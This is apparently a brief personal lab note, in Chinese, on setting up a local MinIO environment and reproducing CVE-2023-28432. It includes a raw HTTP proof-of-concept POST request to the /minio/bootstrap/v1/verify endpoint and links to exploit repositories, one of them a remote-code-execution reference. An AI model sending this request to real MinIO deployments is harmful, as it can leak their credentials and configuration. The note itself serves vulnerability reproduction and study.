minio环境搭建

来源:https://y4er.com/posts/minio-cve-2023-28432/

端口:9001-9004

http://127.0.0.1:9001/minio/login

image-20230403162013981

poc

POST /minio/bootstrap/v1/verify HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Upgrade-Insecure-Requests: 1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

image-20230403162113041

参考

https://github.com/Mr-xn/CVE-2023-28432

https://y4er.com/posts/minio-cve-2023-28432/

https://github.com/AbelChe/evil_minio (rce参考)